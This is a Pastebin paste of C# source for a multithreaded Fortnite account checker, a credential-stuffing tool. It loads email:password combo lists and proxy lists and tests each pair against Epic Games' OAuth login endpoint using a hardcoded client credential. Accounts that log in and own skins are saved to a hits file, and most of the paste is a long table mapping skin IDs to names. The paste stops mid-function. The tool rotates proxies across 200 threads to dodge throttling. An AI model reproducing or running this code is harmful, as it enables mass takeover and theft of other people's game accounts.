Advertisement
DominikHeise

fbrgn

Sep 17th, 2018
22,207
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 57.41 KB | None | 0 0
  1. using Microsoft.VisualBasic.CompilerServices;
  2. using System;
  3. using System.Collections.Generic;
  4. using System.ComponentModel;
  5. using System.Data;
  6. using System.Drawing;
  7. using System.Diagnostics;
  8. using System.Linq;
  9. using System.Text;
  10. using System.IO;
  11. using System.Threading.Tasks;
  12. using System.Net;
  13. using System.Text.RegularExpressions;
  14. using System.Threading;
  15. using System.Windows.Forms;
  16. using System.Xml;
  17. using DevExpress.XtraEditors;
  18. using VisualPlus.Toolkit.Dialogs;
  19. using xNet;
  20.  
  21. namespace FCT
  22. {
  23. public partial class Dashboard : XtraForm
  24. {
  25. private bool isDone { get; set; }
  26. private bool _Run { get; set; }
  27. private bool _IsGood { get; set; }
  28. public ProxyType PType { get; set; }
  29. public int Threadscount { get; set; }
  30. public int ThreadSleepCount { get; set; }
  31.  
  32. public Dashboard()
  33. {
  34. bool flag5 = true;
  35. if (flag5)
  36. {
  37. InitializeComponent();
  38. folder = Path.Combine(string.Format("{0}\\Results\\", Environment.CurrentDirectory), "Results_" + DateTime.Now.ToString("dd.MM_hh.mm"));
  39. bool flag6 = !Directory.Exists(folder);
  40. if (flag6)
  41. {
  42. Directory.CreateDirectory(folder);
  43. }
  44. cmbProxyType.SelectedIndex = 0;
  45. tp1.ToolTipIcon = ToolTipIcon.Info;
  46. tp1.IsBalloon = true;
  47. tp1.ShowAlways = true;
  48. tp1.SetToolTip(lblInvalid, "Invalids refers to accounts that are considered bad or aren't worth anything.");
  49. tp1.SetToolTip(lblValid, "Valid accounts with atleast 1+ skin.");
  50. tp1.SetToolTip(lblErrors, "Errors returned by epic games.. doesn't affect your hit-rate.");
  51. tp1.SetToolTip(lblChecked, "The amount of accounts checked.");
  52. tp1.SetToolTip(cmbCapture, "This filter is still being worked on.");
  53. tp1.SetToolTip(cmbProxyType, "Select whether you wish to use proxies or not!");
  54. tp1.SetToolTip(btnCombo, "Load accounts in a constant algorithm following the format (email:pass) per line, preferably bruted hits from BruteRoyale.");
  55. tp1.SetToolTip(btnProxy, "Only load proxies in the format of ip:port. Make sure also that you select the type of proxies they are on the bottom left.");
  56. }
  57. }
  58.  
  59. private void frmMain_FormClosing(object sender, FormClosingEventArgs e)
  60. {
  61. Environment.Exit(0);
  62. //The first thing i said when i saw this was "Ummmm.... K."
  63. Application.Exit();
  64. }
  65.  
  66. private void Dashboard_Load(object sender, EventArgs e)
  67. {
  68. username.Text = Form1.data.username;
  69. ip.Text = Form1.data.ip;
  70.  
  71. TimeSpan expire = Form1.data.expireTime - DateTime.Now;
  72.  
  73. if (Form1.data.expireTime < DateTime.Now)
  74. time.Text = "Expired!";
  75. else
  76. {
  77. if (expire.Days > 31)
  78. time.Text = "Lifetime";
  79. else
  80. time.Text = string.Format("{0}d, {1}h, {2}m, {3}s", expire.Days, expire.Hours, expire.Minutes, expire.Seconds);
  81. }
  82. }
  83.  
  84. private void btnCombo_Click(object sender, EventArgs e)
  85. {
  86. Combo.Clear();
  87. OpenFileDialog ofd = new OpenFileDialog();
  88. ofd.RestoreDirectory = true;
  89. ofd.Multiselect = false;
  90. ofd.Filter = "Text Files (*.txt)|*.txt";
  91. ofd.FilterIndex = 1;
  92. ofd.ShowDialog();
  93. bool flag8 = Operators.CompareString(ofd.FileName, null, false) > 0;
  94. if (flag8)
  95. {
  96. myFile = ofd.FileName;
  97. using (StreamReader sr = new StreamReader(myFile))
  98. {
  99. while (sr.Peek() != -1)
  100. {
  101. Combo.Add(sr.ReadLine());
  102. }
  103. }
  104. btnCombo.Text = string.Format("Combo List ({0})", Combo.Count);
  105. btnProxy.Text = string.Format("Proxy List ({0})", Proxies.Count);
  106. fileName = Path.GetFileNameWithoutExtension(ofd.FileName);
  107. }
  108. }
  109.  
  110. private void btnProxy_Click(object sender, EventArgs e)
  111. {
  112. OpenFileDialog ofd = new OpenFileDialog();
  113. ofd.Title = "Load Proxy List";
  114. ofd.DefaultExt = "txt";
  115. ofd.Filter = "Text files|*.txt";
  116. ofd.RestoreDirectory = true;
  117. bool flag8 = ofd.ShowDialog() == DialogResult.OK;
  118. if (flag8)
  119. {
  120. try
  121. {
  122. string text = null;
  123. FileStream fileStream = new FileStream(ofd.FileName, FileMode.Open, FileAccess.Read);
  124. using (StreamReader streamReader = new StreamReader(fileStream, Encoding.UTF8))
  125. {
  126. text = streamReader.ReadToEnd();
  127. }
  128. bool flag9 = string.IsNullOrEmpty(text);
  129. if (!flag9)
  130. {
  131. Proxies.Clear();
  132. Proxies.AddRange(text.Split(new char[]
  133. {
  134. Convert.ToChar('\n')
  135. }));
  136. btnCombo.Text = string.Format("Combo List ({0})", Combo.Count);
  137. btnProxy.Text = string.Format("Proxy List ({0})", Proxies.Count);
  138. }
  139. }
  140. catch (Exception)
  141. {
  142. }
  143. }
  144. }
  145.  
  146. private void btnStart_Click(object sender, EventArgs e)
  147. {
  148. bool flag = Directory.Exists(string.Format("{0}\\Results", Environment.CurrentDirectory));
  149. if (!flag)
  150. {
  151. Directory.CreateDirectory(string.Format("{0}\\Results", Environment.CurrentDirectory));
  152. }
  153. textfile = Path.Combine(folder, string.Format("{0}Hits.txt", fileName));
  154. btnStart.Enabled = false;
  155. validcnt = 0;
  156. invalidcnt = 0;
  157. errorcnt = 0;
  158. checkedcnt = 0;
  159. _Run = false;
  160. index = 0;
  161. _Run = true;
  162. SetEnum(cmbProxyType.SelectedIndex);
  163. mainMethod();
  164. }
  165.  
  166. private void btnStop_Click(object sender, EventArgs e)
  167. {
  168. DialogResult dialog = MessageBox.Show("Are you sure you want to stop checking?", "Cancel", MessageBoxButtons.YesNo, MessageBoxIcon.Question);
  169. bool flag = dialog == DialogResult.Yes;
  170. if (flag)
  171. {
  172. _Run = false;
  173. _IsGood = false;
  174. btnStop.Enabled = false;
  175. }
  176. }
  177.  
  178. private bool isCompleted()
  179. {
  180. foreach (Thread item in tList)
  181. {
  182. bool isAlive = item.IsAlive;
  183. if (isAlive)
  184. {
  185. return false;
  186. }
  187. }
  188. return true;
  189. }
  190.  
  191. private void SetEnum(int choice)
  192. {
  193. bool flag = choice == 0;
  194. if (flag)
  195. {
  196. PType = ProxyType.Http;
  197. }
  198. else
  199. {
  200. bool flag2 = choice == 1;
  201. if (flag2)
  202. {
  203. PType = ProxyType.Socks4;
  204. }
  205. else
  206. {
  207. bool flag3 = choice == 2;
  208. if (flag3)
  209. {
  210. PType = ProxyType.Socks5;
  211. }
  212. }
  213. }
  214. }
  215.  
  216. private ProxyClient GetPClient(string proxy)
  217. {
  218. switch (PType)
  219. {
  220. case ProxyType.Http:
  221. return HttpProxyClient.Parse(proxy);
  222.  
  223. case ProxyType.Socks4:
  224. return Socks4aProxyClient.Parse(proxy);
  225.  
  226. case ProxyType.Socks5:
  227. return Socks5ProxyClient.Parse(proxy);
  228. }
  229. return HttpProxyClient.Parse(proxy);
  230. }
  231.  
  232. private void DoWork()
  233. {
  234. string account = string.Empty;
  235. _IsGood = true;
  236. while (_Run)
  237. {
  238. object obj = tLock;
  239. lock (obj)
  240. {
  241. bool flag9 = index < Combo.Count;
  242. if (!flag9)
  243. {
  244. break;
  245. }
  246. account = Combo.ElementAt(index);
  247. index++;
  248. }
  249. string[] combo = account.Split(new char[]
  250. {
  251. ';',
  252. ':',
  253. '|'
  254. });
  255. bool flag10 = account.Length < 2;
  256. if (!flag10)
  257. {
  258. while (_IsGood)
  259. {
  260. bool flag11 = _Run.Equals(false);
  261. if (flag11)
  262. {
  263. return;
  264. }
  265. using (HttpRequest req = new HttpRequest())
  266. {
  267. try
  268. {
  269. req.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36";
  270. req.KeepAlive = true;
  271. req.Cookies = new CookieDictionary(false);
  272. req.IgnoreProtocolErrors = true;
  273. req.ConnectTimeout = 5000;
  274. req.AllowAutoRedirect = false;
  275. bool flag12 = Proxies.Count == 0;
  276. if (flag12)
  277. {
  278. req.Proxy = null;
  279. }
  280. else
  281. {
  282. req.Proxy = GetPClient(Proxies.ElementAt(rnd.Next(Proxies.Count)));
  283. req.Proxy.ConnectTimeout = 5000;
  284. }
  285. req.AddHeader("Authorization", "basic ZWM2ODRiOGM2ODdmNDc5ZmFkZWEzY2IyYWQ4M2Y1YzY6ZTFmMzFjMjExZjI4NDEzMTg2MjYyZDM3YTEzZmM4NGQ=");
  286. string pData = string.Format("grant_type=password&username={0}&password={1}&includePerms=true&token_type=eg1", WebUtility.UrlEncode(combo[0]), combo[1]);
  287. HttpResponse res = req.Post("https://account-public-service-prod03.ol.epicgames.com/account/api/oauth/token", pData, "application/x-www-form-urlencoded");
  288. string text = res.ToString();
  289. bool flag13 = text.Contains("access_token");
  290. if (flag13)
  291. {
  292. string bearer = Regex.Match(text, "\"access_token\" : \"(.*?)\",").Groups[1].Value;
  293. string accountID = Regex.Match(text, "\"account_id\" : \"(.*?)\"").Groups[1].Value;
  294. req.AddHeader("Authorization", string.Format("bearer {0}", bearer));
  295. HttpResponse res2 = req.Post(string.Format("https://fortnite-public-service-prod11.ol.epicgames.com/fortnite/api/game/v2/profile/{0}/client/QueryProfile?profileId=athena&rvn=-1", accountID), "{}", "application/json");
  296. string text2 = res2.ToString();
  297. bool flag14 = text2.Contains("AthenaCharacter");
  298. if (flag14)
  299. {
  300. Interlocked.Increment(ref validcnt);
  301. SaveData(account, text2);
  302. break;
  303. }
  304. bool flag15 = !text2.Contains("AthenaCharacter") && text2.Contains("AthenaPickaxe:defaultpickaxe");
  305. if (flag15)
  306. {
  307. Interlocked.Increment(ref invalidcnt);
  308. break;
  309. }
  310. bool flag16 = text2.Contains("Login is banned or does not posses the action");
  311. if (flag16)
  312. {
  313. Interlocked.Increment(ref invalidcnt);
  314. break;
  315. }
  316. bool flag17 = text2.Contains("Process exited before completing");
  317. if (flag17)
  318. {
  319. Interlocked.Increment(ref invalidcnt);
  320. break;
  321. }
  322. }
  323. else
  324. {
  325. bool flag18 = text.Contains("Sorry the account credentials you are using are invalid");
  326. if (flag18)
  327. {
  328. Interlocked.Increment(ref invalidcnt);
  329. break;
  330. }
  331. bool flag19 = text.Contains("Two-Factor authentication required to process");
  332. if (flag19)
  333. {
  334. Interlocked.Increment(ref invalidcnt);
  335. break;
  336. }
  337. bool flag20 = text.Contains("Operation access is limited by throttling policy");
  338. if (flag20)
  339. {
  340. Interlocked.Increment(ref errorcnt);
  341. }
  342. else
  343. {
  344. bool flag21 = text.Contains("Real ID association is required");
  345. if (flag21)
  346. {
  347. Interlocked.Increment(ref invalidcnt);
  348. break;
  349. }
  350. bool flag22 = text.Contains("Please reset your password to proceed with login");
  351. if (flag22)
  352. {
  353. Interlocked.Increment(ref invalidcnt);
  354. break;
  355. }
  356. bool flag23 = text.Contains("Process exited before completing");
  357. if (flag23)
  358. {
  359. Interlocked.Increment(ref invalidcnt);
  360. break;
  361. }
  362. bool flag24 = text.Contains("account has been locked because of too many invalid login attempts");
  363. if (flag24)
  364. {
  365. Interlocked.Increment(ref invalidcnt);
  366. break;
  367. }
  368. Interlocked.Increment(ref errorcnt);
  369. }
  370. }
  371. }
  372. catch (Exception)
  373. {
  374. Interlocked.Increment(ref errorcnt);
  375. }
  376. }
  377. }
  378. Interlocked.Increment(ref checkedcnt);
  379. continue;
  380. }
  381. }
  382. Thread.Sleep(ThreadSleepCount);
  383. }
  384.  
  385. private void updatestatus()
  386. {
  387. try
  388. {
  389. base.Invoke(new MethodInvoker(() =>
  390. {
  391. lblValid.Text = string.Format("{0}", validcnt);
  392. lblInvalid.Text = string.Format("{0}", invalidcnt);
  393. lblErrors.Text = string.Format("{0}", errorcnt);
  394. lblChecked.Text = string.Format("{0}", checkedcnt);
  395. }));
  396. }
  397. catch (Exception)
  398. {
  399. }
  400. }
  401.  
  402. public void mainMethod()
  403. {
  404. isDone = false;
  405. bool flag = cmbProxyType.SelectedIndex == 3;
  406. if (flag)
  407. {
  408. Threadscount = 20;
  409. }
  410. else
  411. {
  412. Threadscount = 200;
  413. }
  414. ThreadSleepCount = 100;
  415. for (int i = 0; i < Threadscount; i++)
  416. {
  417. Thread t = new Thread(new ThreadStart(DoWork));
  418. t.IsBackground = true;
  419. tList.Add(t);
  420. t.Start();
  421. }
  422. new Thread(() =>
  423. {
  424. for (; ; )
  425. {
  426. bool flag2 = isCompleted();
  427. if (flag2)
  428. {
  429. break;
  430. }
  431. updatestatus();
  432. Thread.Sleep(1000);
  433. }
  434. isDone = true;
  435. base.Invoke(new Action(() =>
  436. {
  437. _Run = false;
  438. MessageBox.Show("Brute / Checker has finished successfully.");
  439. btnStart.Enabled = true;
  440. btnStop.Enabled = true;
  441. updatestatus();
  442. }));
  443. })
  444. {
  445. IsBackground = true
  446. }.Start();
  447. }
  448.  
  449. private void SaveData(string account, string characters)
  450. {
  451. try
  452. {
  453. base.Invoke(new MethodInvoker(() =>
  454. {
  455. using (StreamWriter sw = File.AppendText(textfile))
  456. {
  457. sw.WriteLine("-------------------<EpicAccount>------------------------");
  458. sw.WriteLine("- Login: " + account);
  459. sw.WriteLine("----------------------<Skins>---------------------------");
  460. string x = characters;
  461. bool flag = x.Contains("AthenaCharacter:cid_036_athena_commando_m_wintercamo");
  462. if (flag)
  463. {
  464. sw.WriteLine("=> Absolute Zero");
  465. }
  466. bool flag2 = x.Contains("AthenaCharacter:cid_121_athena_commando_m_graffiti");
  467. if (flag2)
  468. {
  469. sw.WriteLine("=> Abstrakt");
  470. }
  471. bool flag3 = x.Contains("AthenaCharacter:cid_017_athena_commando_m");
  472. if (flag3)
  473. {
  474. sw.WriteLine("=> Aerial Assault Troop");
  475. }
  476. bool flag4 = x.Contains("AthenaCharacter:cid_059_athena_commando_m_skidude_chn");
  477. if (flag4)
  478. {
  479. sw.WriteLine("=> Alpine Ace (CHN)");
  480. }
  481. bool flag5 = x.Contains("AthenaCharacter:cid_055_athena_commando_m_skidude_can");
  482. if (flag5)
  483. {
  484. sw.WriteLine("=> Alpine Ace (CAN)");
  485. }
  486. bool flag6 = x.Contains("AthenaCharacter:cid_058_athena_commando_m_skidude_ger");
  487. if (flag6)
  488. {
  489. sw.WriteLine("=> Alpine Ace (GER)");
  490. }
  491. bool flag7 = x.Contains("AthenaCharacter:cid_037_athena_commando_f_wintercamo");
  492. if (flag7)
  493. {
  494. sw.WriteLine("=> Arctic Assassin");
  495. }
  496. bool flag8 = x.Contains("AthenaCharacter:cid_015_athena_commando_f");
  497. if (flag8)
  498. {
  499. sw.WriteLine("=> Assault Trooper");
  500. }
  501. bool flag9 = x.Contains("AthenaCharacter:cid_100_athena_commando_m_cuchulainn");
  502. if (flag9)
  503. {
  504. sw.WriteLine("=> Battle Hound");
  505. }
  506. bool flag10 = x.Contains("AthenaCharacter:cid_125_athena_commando_m_tacticalwoodland");
  507. if (flag10)
  508. {
  509. sw.WriteLine("=> BattleHawk");
  510. }
  511. bool flag11 = x.Contains("AthenaCharacter:cid_035_athena_commando_m_medieval");
  512. if (flag11)
  513. {
  514. sw.WriteLine("=> Black Knight");
  515. }
  516. bool flag12 = x.Contains("AthenaCharacter:cid_032_athena_commando_m_medieval");
  517. if (flag12)
  518. {
  519. sw.WriteLine("=> Blue Squire");
  520. }
  521. bool flag13 = x.Contains("AthenaCharacter:cid_138_athena_commando_m_psburnout");
  522. if (flag13)
  523. {
  524. sw.WriteLine("=> Blue Striker");
  525. }
  526. bool flag14 = x.Contains("AthenaCharacter:cid_052_athena_commando_f_psblue");
  527. if (flag14)
  528. {
  529. sw.WriteLine("=> Blue Team Leader");
  530. }
  531. bool flag15 = x.Contains("AthenaCharacter:cid_021_athena_commando_f");
  532. if (flag15)
  533. {
  534. sw.WriteLine("=> Brawler");
  535. }
  536. bool flag16 = x.Contains("AthenaCharacter:cid_092_athena_commando_f_redshirt");
  537. if (flag16)
  538. {
  539. sw.WriteLine("=> Brilliant Striker");
  540. }
  541. bool flag17 = x.Contains("AthenaCharacter:cid_044_athena_commando_f_scipop");
  542. if (flag17)
  543. {
  544. sw.WriteLine("=> Brite Bomber ");
  545. }
  546. bool flag18 = x.Contains("AthenaCharacter:cid_112_athena_commando_m_brite");
  547. if (flag18)
  548. {
  549. sw.WriteLine("=> Brite Gunner");
  550. }
  551. bool flag19 = x.Contains("AthenaCharacter:cid_104_athena_commando_f_bunny");
  552. if (flag19)
  553. {
  554. sw.WriteLine("=> Bunny Brawler");
  555. }
  556. bool flag20 = x.Contains("AthenaCharacter:cid_094_athena_commando_m_rider");
  557. if (flag20)
  558. {
  559. sw.WriteLine("=> Burnout");
  560. }
  561. bool flag21 = x.Contains("AthenaCharacter:cid_115_athena_commando_m_carbideblue");
  562. if (flag21)
  563. {
  564. sw.WriteLine("=> Carbide");
  565. }
  566. bool flag22 = x.Contains("AthenaCharacter:cid_123_athena_commando_f_metal");
  567. if (flag22)
  568. {
  569. sw.WriteLine("=> Chromium");
  570. }
  571. bool flag23 = x.Contains("AthenaCharacter:cid_110_athena_commando_f_circuitbreaker");
  572. if (flag23)
  573. {
  574. sw.WriteLine("=> Circuit Breaker");
  575. }
  576. bool flag24 = x.Contains("AthenaCharacter:cid_151_athena_commando_f_soccergirld");
  577. if (flag24)
  578. {
  579. sw.WriteLine("=> Clinical Crosser");
  580. }
  581. bool flag25 = x.Contains("AthenaCharacter:cid_051_athena_commando_m_holidayelf");
  582. if (flag25)
  583. {
  584. sw.WriteLine("=> Codename ELF");
  585. }
  586. bool flag26 = x.Contains("AthenaCharacter:cid_016_athena_commando_f");
  587. if (flag26)
  588. {
  589. sw.WriteLine("=> Commando");
  590. }
  591. bool flag27 = x.Contains("AthenaCharacter:cid_050_athena_commando_m_holidaynutcracker");
  592. if (flag27)
  593. {
  594. sw.WriteLine("=> Crackshot");
  595. }
  596. bool flag28 = x.Contains("AthenaCharacter:cid_069_athena_commando_f_pinkbear");
  597. if (flag28)
  598. {
  599. sw.WriteLine("=> Cuddle Team Leader");
  600. }
  601. bool flag29 = x.Contains("AthenaCharacter:cid_105_athena_commando_f_spaceblack");
  602. if (flag29)
  603. {
  604. sw.WriteLine("=> Dark Vanguard");
  605. }
  606. bool flag30 = x.Contains("AthenaCharacter:cid_088_athena_commando_m_spaceblack");
  607. if (flag30)
  608. {
  609. sw.WriteLine("=> Dark Voyager");
  610. }
  611. bool flag31 = x.Contains("AthenaCharacter:cid_076_athena_commando_f_sup");
  612. if (flag31)
  613. {
  614. sw.WriteLine("=> Dazzle");
  615. }
  616. bool flag32 = x.Contains("AthenaCharacter:cid_040_athena_commando_m_district");
  617. if (flag32)
  618. {
  619. sw.WriteLine("=> Devastator");
  620. }
  621. bool flag33 = x.Contains("AthenaCharacter:cid_083_athena_commando_f_tactical");
  622. if (flag33)
  623. {
  624. sw.WriteLine("=> Elite Agent");
  625. }
  626. bool flag34 = x.Contains("AthenaCharacter:cid_143_athena_commando_f_darkninja");
  627. if (flag34)
  628. {
  629. sw.WriteLine("=> Fate");
  630. }
  631. bool flag35 = x.Contains("AthenaCharacter:cid_132_athena_commando_m_venus");
  632. if (flag35)
  633. {
  634. sw.WriteLine("=> Flytrap");
  635. }
  636. bool flag36 = x.Contains("AthenaCharacter:cid_038_athena_commando_m_disco");
  637. if (flag36)
  638. {
  639. sw.WriteLine("=> Funk Ops");
  640. }
  641. bool flag37 = x.Contains("AthenaCharacter:cid_029_athena_commando_f_halloween");
  642. if (flag37)
  643. {
  644. sw.WriteLine("=> Ghoul Trooper");
  645. }
  646. bool flag38 = x.Contains("AthenaCharacter:cid_048_athena_commando_f_holidaygingerbread");
  647. if (flag38)
  648. {
  649. sw.WriteLine("=> Ginger Gunner");
  650. }
  651. bool flag39 = x.Contains("AthenaCharacter:cid_155_athena_commando_f_gumshoe");
  652. if (flag39)
  653. {
  654. sw.WriteLine("=> Gumshoe ");
  655. }
  656. bool flag40 = x.Contains("AthenaCharacter:cid_089_athena_commando_m_retrogrey");
  657. if (flag40)
  658. {
  659. sw.WriteLine("=> Havoc");
  660. }
  661. bool flag41 = x.Contains("AthenaCharacter:cid_099_athena_commando_f_scathach");
  662. if (flag41)
  663. {
  664. sw.WriteLine("=> Highland Warrior");
  665. }
  666. bool flag42 = x.Contains("AthenaCharacter:cid_074_athena_commando_f_stripe");
  667. if (flag42)
  668. {
  669. sw.WriteLine("=> Jungle Scout");
  670. }
  671. bool flag43 = x.Contains("AthenaCharacter:cid_108_athena_commando_m_fishhead");
  672. if (flag43)
  673. {
  674. sw.WriteLine("=> Leviathan");
  675. }
  676. bool flag44 = x.Contains("AthenaCharacter:cid_126_athena_commando_m_auroraglow");
  677. if (flag44)
  678. {
  679. sw.WriteLine("=> LiteShow");
  680. }
  681. bool flag45 = x.Contains("AthenaCharacter:cid_070_athena_commando_m_cupid");
  682. if (flag45)
  683. {
  684. sw.WriteLine("=> Love Ranger");
  685. }
  686. bool flag46 = x.Contains("AthenaCharacter:cid_103_athena_commando_m_bunny");
  687. if (flag46)
  688. {
  689. sw.WriteLine("=> Bunny Raider");
  690. }
  691. bool flag47 = x.Contains("AthenaCharacter:cid_049_athena_commando_m_holidaygingerbread");
  692. if (flag47)
  693. {
  694. sw.WriteLine("=> Marry Marauder");
  695. }
  696. bool flag48 = x.Contains("AthenaCharacter:cid_080_athena_commando_m_space");
  697. if (flag48)
  698. {
  699. sw.WriteLine("=> Mission Specialist");
  700. }
  701. bool flag49 = x.Contains("AthenaCharacter:cid_081_athena_commando_f_space");
  702. if (flag49)
  703. {
  704. sw.WriteLine("=> Moonwalker");
  705. }
  706. bool flag50 = x.Contains("AthenaCharacter:cid_062_athena_commando_f_skigirl_usa");
  707. if (flag50)
  708. {
  709. sw.WriteLine("=> Mogul Master (USA)");
  710. }
  711. bool flag51 = x.Contains("AthenaCharacter:cid_023_athena_commando_f");
  712. if (flag51)
  713. {
  714. sw.WriteLine("=> Munitions Expert");
  715. }
  716. bool flag52 = x.Contains("AthenaCharacter:cid_124_athena_commando_f_auroraglow");
  717. if (flag52)
  718. {
  719. sw.WriteLine("=> NiteLite");
  720. }
  721. bool flag53 = x.Contains("AthenaCharacter:cid_046_athena_commando_f_holidaysweater");
  722. if (flag53)
  723. {
  724. sw.WriteLine("=> Nog Ops");
  725. }
  726. bool flag54 = x.Contains("AthenaCharacter:cid_159_athena_commando_m_gumshoedark");
  727. if (flag54)
  728. {
  729. sw.WriteLine("=> Noir");
  730. }
  731. bool flag55 = x.Contains("AthenaCharacter:cid_116_athena_commando_m_carbideblack");
  732. if (flag55)
  733. {
  734. sw.WriteLine("=> Omega");
  735. }
  736. bool flag56 = x.Contains("AthenaCharacter:cid_141_athena_commando_m_darkeagle");
  737. if (flag56)
  738. {
  739. sw.WriteLine("=> Omen");
  740. }
  741. bool flag57 = x.Contains("AthenaCharacter:cid_149_athena_commando_f_soccergirlb");
  742. if (flag57)
  743. {
  744. sw.WriteLine("=> Poised Playmaker");
  745. }
  746. bool flag58 = x.Contains("AthenaCharacter:cid_097_athena_commando_f_rockerpunk");
  747. if (flag58)
  748. {
  749. sw.WriteLine("=> Power Chord");
  750. }
  751. bool flag59 = x.Contains("AthenaCharacter:cid_091_athena_commando_m_redshirt");
  752. if (flag59)
  753. {
  754. sw.WriteLine("=> Radiant Striker");
  755. }
  756. bool flag60 = x.Contains("AthenaCharacter:cid_135_athena_commando_f_jailbird");
  757. if (flag60)
  758. {
  759. sw.WriteLine("=> Rapscallion");
  760. }
  761. bool flag61 = x.Contains("AthenaCharacter:cid_031_athena_commando_m_retro");
  762. if (flag61)
  763. {
  764. sw.WriteLine("=> Raptor");
  765. }
  766. bool flag62 = x.Contains("AthenaCharacter:cid_102_athena_commando_m_raven");
  767. if (flag62)
  768. {
  769. sw.WriteLine("=> Raven");
  770. }
  771. bool flag63 = x.Contains("cid_022_athena_commando_f");
  772. if (flag63)
  773. {
  774. sw.WriteLine("=> Recon Expert");
  775. }
  776. bool flag64 = x.Contains("AthenaCharacter:cid_024_athena_commando_f");
  777. if (flag64)
  778. {
  779. sw.WriteLine("=> Recon Specialist");
  780. }
  781. bool flag65 = x.Contains("AthenaCharacter:cid_034_athena_commando_f_medieval");
  782. if (flag65)
  783. {
  784. sw.WriteLine("=> Red Knight");
  785. }
  786. bool flag66 = x.Contains("AthenaCharacter:cid_047_athena_commando_f_holidayreindeer");
  787. if (flag66)
  788. {
  789. sw.WriteLine("=> Red Nosed Raider");
  790. }
  791. bool flag67 = x.Contains("AthenaCharacter:cid_013_athena_commando_f");
  792. if (flag67)
  793. {
  794. sw.WriteLine("=> Renegade");
  795. }
  796. bool flag68 = x.Contains("AthenaCharacter:cid_028_athena_commando_f");
  797. if (flag68)
  798. {
  799. sw.WriteLine("=> Renegade Raider");
  800. }
  801. bool flag69 = x.Contains("AthenaCharacter:cid_093_athena_commando_m_dinosaur");
  802. if (flag69)
  803. {
  804. sw.WriteLine("=> Rex");
  805. }
  806. bool flag70 = x.Contains("AthenaCharacter:cid_090_athena_commando_m_tactical");
  807. if (flag70)
  808. {
  809. sw.WriteLine("=> Rogue Agent");
  810. }
  811. bool flag71 = x.Contains("AthenaCharacter:cid_033_athena_commando_f_medieval");
  812. if (flag71)
  813. {
  814. sw.WriteLine("=> Royale Knight");
  815. }
  816. bool flag72 = x.Contains("AthenaCharacter:cid_082_athena_commando_m_scavenger");
  817. if (flag72)
  818. {
  819. sw.WriteLine("=> Rust Lord");
  820. }
  821. bool flag73 = x.Contains("AthenaCharacter:cid_087_athena_commando_f_redsilk");
  822. if (flag73)
  823. {
  824. sw.WriteLine("=> Scarlet Defender");
  825. }
  826. bool flag74 = x.Contains("AthenaCharacter:cid_134_athena_commando_m_jailbird");
  827. if (flag74)
  828. {
  829. sw.WriteLine("=> Scoundrel");
  830. }
  831. bool flag75 = x.Contains("AthenaCharacter:cid_072_athena_commando_m_scout");
  832. if (flag75)
  833. {
  834. sw.WriteLine("=> Scout");
  835. }
  836. bool flag76 = x.Contains("AthenaCharacter:cid_098_athena_commando_f_stpatty");
  837. if (flag76)
  838. {
  839. sw.WriteLine("=> Sgt Green Clover");
  840. }
  841. bool flag77 = x.Contains("AthenaCharacter:cid_043_athena_commando_f_stealth");
  842. if (flag77)
  843. {
  844. sw.WriteLine("=> Shadow Ops");
  845. }
  846. bool flag78 = x.Contains("AthenaCharacter:cid_030_athena_commando_m_halloween");
  847. if (flag78)
  848. {
  849. sw.WriteLine("=> Skull Trooper");
  850. }
  851. bool flag79 = x.Contains("AthenaCharacter:cid_142_athena_commando_m_wwiipilot");
  852. if (flag79)
  853. {
  854. sw.WriteLine("=> Sky Stalker");
  855. }
  856. bool flag80 = x.Contains("AthenaCharacter:cid_073_athena_commando_f_scuba");
  857. if (flag80)
  858. {
  859. sw.WriteLine("=> Snorkel Ops");
  860. }
  861. bool flag81 = x.Contains("AthenaCharacter:cid_150_athena_commando_f_soccergirlc");
  862. if (flag81)
  863. {
  864. sw.WriteLine("=> Soccer Girl C");
  865. }
  866. bool flag82 = x.Contains("AthenaCharacter:cid_039_athena_commando_f_disco");
  867. if (flag82)
  868. {
  869. sw.WriteLine("=> Sparkle Specialist");
  870. }
  871. bool flag83 = x.Contains("AthenaCharacter:cid_020_athena_commando_m");
  872. if (flag83)
  873. {
  874. sw.WriteLine("=> Special Forces");
  875. }
  876. bool flag84 = x.Contains("AthenaCharacter:cid_117_athena_commando_m_tacticaljungle");
  877. if (flag84)
  878. {
  879. sw.WriteLine("=> Squad Leader");
  880. }
  881. bool flag85 = x.Contains("AthenaCharacter:cid_085_athena_commando_m_twitch");
  882. if (flag85)
  883. {
  884. sw.WriteLine("=> Sub Commander");
  885. }
  886. bool flag86 = x.Contains("AthenaCharacter:cid_027_athena_commando_f");
  887. if (flag86)
  888. {
  889. sw.WriteLine("=> Survival Specialist");
  890. }
  891. bool flag87 = x.Contains("AthenaCharacter:cid_120_athena_commando_f_graffiti");
  892. if (flag87)
  893. {
  894. sw.WriteLine("=> Teknique");
  895. }
  896. bool flag88 = x.Contains("AthenaCharacter:cid_084_athena_commando_m_assassin");
  897. if (flag88)
  898. {
  899. sw.WriteLine("=> The Reaper");
  900. }
  901. bool flag89 = x.Contains("AthenaCharacter:cid_140_athena_commando_m_visitor");
  902. if (flag89)
  903. {
  904. sw.WriteLine("=> The Visitor");
  905. }
  906. bool flag90 = x.Contains("AthenaCharacter:cid_109_athena_commando_m_pizza");
  907. if (flag90)
  908. {
  909. sw.WriteLine("=> Tomato Headd");
  910. }
  911. bool flag91 = x.Contains("AthenaCharacter:cid_127_athena_commando_m_hazmat");
  912. if (flag91)
  913. {
  914. sw.WriteLine("=> Toxic Trooper");
  915. }
  916. bool flag92 = x.Contains("AthenaCharacter:cid_114_athena_commando_f_tacticalwoodland");
  917. if (flag92)
  918. {
  919. sw.WriteLine("=> Trailblazer");
  920. }
  921. bool flag93 = x.Contains("cid_009_athena_commando_m");
  922. if (flag93)
  923. {
  924. sw.WriteLine("=> Tracker");
  925. }
  926. bool flag94 = x.Contains("AthenaCharacter:cid_107_athena_commando_f_pajamaparty");
  927. if (flag94)
  928. {
  929. sw.WriteLine("=> Tricera Ops");
  930. }
  931. bool flag95 = x.Contains("AthenaCharacter:cid_137_athena_commando_f_basketball");
  932. if (flag95)
  933. {
  934. sw.WriteLine("=> Triple Threat");
  935. }
  936. bool flag96 = x.Contains("AthenaCharacter:cid_012_athena_commando_m");
  937. if (flag96)
  938. {
  939. sw.WriteLine("=> Trooper");
  940. }
  941. bool flag97 = x.Contains("AthenaCharacter:cid_118_athena_commando_f_valor");
  942. if (flag97)
  943. {
